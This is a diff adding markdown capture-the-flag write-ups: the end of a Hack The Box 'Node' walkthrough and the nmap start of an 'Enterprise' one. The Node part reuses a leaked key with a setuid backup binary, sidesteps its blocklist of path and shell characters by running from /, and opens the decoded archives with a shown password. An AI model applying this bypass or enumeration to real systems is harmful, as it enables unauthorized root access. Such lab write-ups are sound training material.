+ write(1, "\n", 1
+ ) = 1
+ exit_group(1) = ?
+ +++ exited with 1 +++
+
+
+
+And here we see that it's trying to read something in /etc/myplace/keys so let's check it on our box :
+
+
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
+ $ cd /etc/myplace
+ $ cat keys
+ a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
+ **45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474**
+ 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
+
+
+
+and we get 3 hashes ! and if you look closely, here we have one of the keys we found with our previous recursive grep -Ri command. so let's copy it locally and see what the binary tries to do once we have this /etc/myplace/keys file in place.
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Node]
+ → mkdir /etc/myplace
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Node]
+ → nano /etc/myplace/keys
+
+
+
+Now that it's in place, let's try to execute the backup with that one particular key we found again on the /root directory :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
+ [+] Finished! Encoded backup is below:
+
+ UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
+
+
+And we seem to get a base64 encoded string, let's copy it into a file, and decode it.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano b64backup
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat b64backup
+ UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat b64backup | base64 -d > b64d_backup
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file b64d_backup
+ b64d_backup: Zip archive data, at least v?[0x333] to extract
+
+
+And we have a zip archive, so let's try to unzip it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → unzip b64d_backup
+ Archive: b64d_backup
+ skipping: root.txt need PK compat. v5.1 (can do v4.6)
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → 7z e b64d_backup
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 1141 bytes (2 KiB)
+
+ Extracting archive: b64d_backup
+ --
+ Path = b64d_backup
+ Type = zip
+ Physical Size = 1141
+
+
+ Enter password (will not be echoed):
+ Everything is Ok
+
+ Size: 2584
+ Compressed: 1141
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ls
+ b64backup b64d_backup backup nihilist.sh LinEnum.sh myplace myplace.backup root.txt var
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat root.txt
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
+ QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
+ QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
+ QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
+ QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
+ QQQQQQQP'.yQQQQQQQQQQQP" <****wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
+ QQQQQP'_a. <****aamQQQW! <****yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
+ QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <****wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
+ QQ[ j@mQP'adQQP4ga, -????" <****jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
+ QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
+ QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
+ QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
+ QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??' <****mWWWWWQW?^ ` ]6QQ' yQQQQQ
+ QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
+ QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <****aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
+ QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
+ QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <****c jWQ ]QQQQQQQ
+ QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
+ QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
+ QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
+ QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
+ QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
+ QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV} <****wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
+ QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
+ QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
+ QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
+ QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
+
+successfully unzipping it, we get a troll root.txt so upon further inspection of the backup binary file using radare2 we see that we need to supply other arguements
+
+
+
+in this function we see that we have a sanitiszation happening at the beginning of the function, and if it's 2 periods, it is going to push that b64 trollface string.
+
+
+
+in this function we see that we are also unable to give it the /root parameter
+
+and looking at the other functions we see that we are unable to use .. /root : & ` $ | /etc // / as parameters given to that backup binary
+
+But as you can see we don't have just root, we have /root so we can simply go to the / directory, and execute the binary from there, we don't have to give it the / before passing the root parameter.
+
+
+ $ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 home/tom/user.txt
+ UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFkYyF9edXgLAAEEAAAAAAToAwAAYg9ogU9H2FDWDWqaDu0w9XL3V2d03Xaa+Yqp/4M9tOD/HInQtG22oqn5GlP2UEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA=
+
+ $ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
+
+ 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
+
+
+Because we are ALREADY at / we don't need to say /root which is a bad character. so let's copy this locally :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano user.zip.b64
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat user.zip.b64| base64 -d > user.zip
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → 7z e user.zip
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 245 bytes (1 KiB)
+
+ Extracting archive: user.zip
+ --
+ Path = user.zip
+ Type = zip
+ Physical Size = 245
+
+
+ Enter password (will not be echoed):
+ Everything is Ok
+
+ Size: 33
+ Compressed: 245
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat user.txt
+ e1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag ! now let's do the same with the root flag :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano root.zip.b64
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat root.zip.b64| base64 -d > root.zip
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file root.zip
+ root.zip: Zip archive data, at least v1.0 to extract
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → 7z e root.zip
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 3858 bytes (4 KiB)
+
+ Extracting archive: root.zip
+ --
+ Path = root.zip
+ Type = zip
+ Physical Size = 3858
+
+
+ Enter password (will not be echoed):
+
+ Would you like to replace the existing file:
+ Path: ./root.txt
+ Size: 2584 bytes (3 KiB)
+ Modified: 2017-09-02 23:51:30
+ with the file from archive:
+ Path: root/root.txt
+ Size: 33 bytes (1 KiB)
+ Modified: 2017-09-03 14:46:40
+ ? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? A
+
+ Everything is Ok
+
+ Folders: 3
+ Files: 7
+ Size: 4268
+ Compressed: 3858
+
+
+Giving it the password "magicword" we successfully unzip it just like the previous zip file we decoded :
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat root.txt
+ 17XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/14.md b/Medium/14.md
new file mode 100644
index 0000000..da1e6ff
--- /dev/null
+++ b/Medium/14.md
@@ -0,0 +1,928 @@
+# Enterprise Writeup
+
+
+
+## Introduction :
+
+Enterprise is a medium linux box released back in October 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nmap --top-ports 65000 10.10.10.61 -F
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 18:08 GMT
+ Nmap scan report for 10.10.10.61
+ Host is up (0.093s latency).
+ Not shown: 8315 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 443/tcp open https
+ 5355/tcp filtered llmnr
+ 8080/tcp open http-proxy
+
+ Nmap done: 1 IP address (1 host up) scanned in 43.10 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nmap -sCV -p22,80,443,5355,8080 10.10.10.61
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 18:09 GMT
+ Nmap scan report for 10.10.10.61
+ Host is up (0.096s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
+ | 256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
+ |_ 256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519)
+ 80/tcp open http Apache httpd 2.4.10 ((Debian))
+ |_http-generator: WordPress 4.8.1
+ |_http-server-header: Apache/2.4.10 (Debian)
+ |_http-title: USS Enterprise - Ships Log
